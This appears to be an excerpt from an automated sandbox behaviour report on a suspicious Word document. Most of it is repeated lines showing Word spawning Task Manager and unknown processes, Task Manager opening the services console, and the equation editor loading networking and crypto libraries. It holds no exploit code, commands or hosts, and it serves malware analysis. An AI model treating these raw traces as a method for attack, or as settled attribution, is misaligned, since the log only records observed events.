Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\taskmgr.exe "C:\Windows\system32\taskmgr.exe"Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: C:\Windows\System32\mmc.exe "C:\Windows\system32\mmc.exe" "C:\Windows\System32\services.msc" Jump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Windows\System32\taskmgr.exeProcess created: unknown unknownJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: mshtml.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: oleacc.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: sxs.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: credssp.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ncrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: bcrypt.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: gpapi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msls31.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: d2d1.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwrite.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dxgi.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: d3d11.dllJump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dll
Source: C:\Windows\System32\mmc.exeSection loaded: duser.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dll
Source: C:\Windows\System32\mmc.exeSection loaded: version.dll
Source: C:\Windows\System32\mmc.exeSection loaded: bcrypt.dll
Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: atl.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmfutil.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwmapi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: cryptsp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: rpcrtremote.dll
Source: C:\Windows\System32\mmc.exeSection loaded: ntmarta.dll
Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dll
Source: C:\Windows\System32\mmc.exeSection loaded: secur32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d2d1.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dwrite.dll
Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dll
Source: C:\Windows\System32\mmc.exeSection loaded: d3d10warp.dll
Source: C:\Windows\System32\mmc.exeSection loaded: msls31.dll
Source: C:\Windows\System32\mmc.exeSection loaded: winmm.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dll
Source: C:\Windows\System32\mmc.exeSection loaded: odbc32.dll
Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dll
